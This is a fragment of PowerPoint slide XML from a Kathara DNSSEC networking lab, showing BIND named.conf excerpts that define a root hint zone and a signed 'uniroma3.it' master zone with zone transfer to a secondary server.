                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2C952C8-8752-1223-FC5B-4CB16392952A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969" cy="151"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/dnsuni2/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104633882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B351A8-F72E-B6A0-5A84-203752101FE6}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EABD080-BA35-66D1-A4AF-2BC6E3428A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8AC9EA5-9504-6CE5-19B2-EBB67E1E064C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFC921DD-E209-B29A-C849-00A0FFA64F29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6A67B01-72AE-819D-7009-C505C15615EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="1259632"/>
            <a:ext cx="7087578" cy="4338089"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="1710"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ABEA3D0-9944-9FDF-1B8E-C1B632108CB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="1652"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>include "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zone "." {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>type</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hint</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zone "uniroma3.it" {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>type</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> master;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/db.uniroma3";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-policy default;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>inline-signing</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>allow</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-transfer { 100.0.75.10; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>also-notify</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> { 100.0.75.10; }; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ED7BD99-D368-2C29-069C-02864D316D7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969" cy="151"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65553384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248596-99A8-577E-8464-5699459624FF}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09668999-D777-9284-A783-43D8B5D1607C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B7259DE-5263-105A-BA03-27A15A39C32D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D18C480-648A-F72F-9B45-6B0C0ECCA546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{523FB3B7-B1B3-BA75-DA6E-65720B8E3A9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
